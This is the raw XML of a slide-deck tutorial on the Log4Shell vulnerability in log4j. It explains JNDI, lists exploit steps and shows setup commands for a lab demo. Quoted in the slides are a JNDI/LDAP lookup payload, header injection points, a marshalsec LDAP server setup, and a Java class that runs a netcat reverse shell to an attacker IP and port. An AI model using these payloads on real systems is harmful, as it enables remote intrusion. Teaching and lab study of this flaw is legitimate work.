          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1277937">
            <a:off x="4938400" y="2685532"/>
            <a:ext cx="4314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${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>paylod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/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8BA7EF-D3B4-40A2-9294-4EAD4D00D357}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21444963">
            <a:off x="4993950" y="5551847"/>
            <a:ext cx="294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anose="03070402050302030203" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Req </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Bradley Hand ITC" panose="03070402050302030203" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>paylod</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Bradley Hand ITC" panose="03070402050302030203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AD8557-C2D8-48B5-B95B-877CCFCD4A8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21292811">
            <a:off x="4265615" y="4223784"/>
            <a:ext cx="2320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radley Hand ITC" panose="03070402050302030203" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Paylod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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4CEE2-EC19-44C2-A394-0E86C29F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71"/>
            <a:ext cx="12188825" cy="68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2CC8E-11B0-497C-A9F4-16187D4615EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1370012" y="1600200"/>
            <a:ext cx="83768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channel :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/channel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>UCdO2LkJKYbldLHcvqboFdrQ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-JO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Linkedin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www.linkedin.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/mohnad-banat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Log4shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vuln</a:t>
            </a:r>
            <a:endParaRPr lang="ar-JO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JNDI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability requirements and how to install them</a:t>
            </a:r>
            <a:endParaRPr lang="ar-JO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to exploit it </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo at machines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LogForge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D910-9524-499E-B83C-AC49491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346 Lets Go Stock Photos, Pictures &amp;amp; Royalty-Free Images - iStock">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82860BFB-6F78-46C4-B64A-BEEA1FF06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"/>
            <a:ext cx="12188825" cy="685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246-2713-4283-9CCD-7E7E13DB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  <a:r>
              <a:rPr lang="ar-JO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Log4shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vuln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315E-950E-4D12-A863-EF57A149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Log4shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is 0-day in the popular Java logging library </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>log4j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (version 2) was discovered that results in Remote Code Execution (RCE), where an attacker with permission to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>modify the logging configuration file can construct a malicious configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> using a JDBC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Appender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with a data source referencing a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> URI which can execute remote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5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3104-9486-4F73-BA8E-9D18FE6F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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JNDI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BD9-1B4F-44F0-9B47-6966D324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JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(java Naming and Directory Interface)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-JO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is (API) designed to provide a common interface to access existing services like DNS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NDS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LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, CORBA and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RMI</a:t>
            </a:r>
            <a:endParaRPr lang="ar-JO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>paylod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-file}</a:t>
            </a:r>
            <a:endParaRPr lang="ar-J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466-F9E3-45EB-8C0E-1ECD692F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22497"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How exploit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52BE-8DB8-4D0F-9EE1-3CA9C377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897134"/>
            <a:ext cx="11352213" cy="526693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Find any place for user-supplied data </a:t>
            </a:r>
            <a:endParaRPr lang="ar-JO" dirty="0"/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Ex: HTTP headers such as User-Agent, X-Forwarded-For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ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server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Creat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> shell java class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any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FMono-Regular"/>
              </a:rPr>
              <a:t>busybox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t> httpd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listen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="SFMono-Regular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SFMono-Regular"/>
              </a:rPr>
              <a:t>Send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>paylode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9D8871FD-61AB-4D2E-9F11-F7C0A9C5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Vulnerability requirements and how to install them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5A9FD-DCB8-41BC-AD55-F5E1D6856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2" y="2743200"/>
            <a:ext cx="10360501" cy="2797336"/>
          </a:xfr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FFE92F-5760-48FA-9528-6AE7E38E2076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1218882" y="1801103"/>
            <a:ext cx="7923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Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>marshalsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> :https://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mbechler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>marshalsec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2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346F-9A86-43E4-A355-4566074A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8779"/>
            <a:ext cx="10437972" cy="6502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need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Java 1.8.0_181 install in :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mirrors.rootpei.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>jdk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Ubuntu"/>
            </a:endParaRP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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> 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cd 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tar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>xzvf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> ~/Downloads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>jdk-8u181-linux-x64.tar.gz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>   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update-alternatives --install "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/bin/java" "java" "/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>jdk1.8.0_181</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/bin/java" 1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update-alternatives --install "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>javac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>javac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>" "/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>jdk1.8.0_181</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>javac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>" 1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update-alternatives --install "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>javaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>javaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>" "/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>jdk1.8.0_181</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>javaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>" 1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update-alternatives --set java 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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>jdk1.8.0_181</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/bin/java</a:t>
            </a:r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update-alternatives --set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>javac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> 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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>jdk1.8.0_181</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>javac</a:t>
            </a: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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> update-alternatives --set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>javaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>jvm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>jdk1.8.0_181</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>javaws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41A00-11BE-4420-9FBC-2CE5469BFD3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="2819400"/>
            <a:ext cx="8305800" cy="392167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A9DC6-6333-487A-8762-3BB98061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51" y="838200"/>
            <a:ext cx="8057924" cy="17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C9E4B-992D-4ABD-A466-9A7F1E6163CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1446212" y="457200"/>
            <a:ext cx="6111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shell java class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99DE5-61DB-46FC-A9B0-296E5231FFEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836611" y="1219200"/>
            <a:ext cx="1135221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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BAC8D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r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    static {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BAC8D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r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try {</a:t>
            </a:r>
          </a:p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700" b="0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java.lang.Runtime.getRuntime</a:t>
            </a:r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().exec("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0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-e /bin/bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BAC8D4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BAC8D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BAC8D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; &lt;port&gt;</a:t>
            </a:r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     } catch (Exception e) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BAC8D4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0" i="0" dirty="0" err="1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r>
              <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BAC8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53F62-866B-4FFC-8654-EEE73AE91DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836611" y="1219200"/>
            <a:ext cx="11201401" cy="24468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06B1-FFED-4679-B5E3-26D91B2052B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="942600" y="3872534"/>
            <a:ext cx="610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Compile your payload </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p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shell.java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -source 8 -target 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A5C07-BC61-44CD-A692-8041FA2C945D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="5334000"/>
            <a:ext cx="4648200" cy="533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E5703-F16B-4CAF-87C9-03CBA3E9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5234457"/>
            <a:ext cx="7321233" cy="14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546</TotalTime>
  <Words>531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Bradley Hand ITC</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>SFMono-Regular</vt:lpstr>
      <vt:lpstr>Ubuntu</vt:lpstr>
      <vt:lpstr>Tech 16x9</vt:lpstr>
      <vt:lpstr>Log4shell</vt:lpstr>
      <vt:lpstr>Content</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>What is it  Log4shell vuln </vt:lpstr>
      <vt:lpstr>What is it JNDI </vt:lpstr>
      <vt:lpstr>How exploit it </vt:lpstr>
      <vt:lpstr>Vulnerability requirements and how to install them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Log4shell</dc:title>
  <dc:creator>mohnad banat</dc:creator>
  <cp:lastModifiedBy>mohnad banat</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-10T12:03:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-12T16:24:30Z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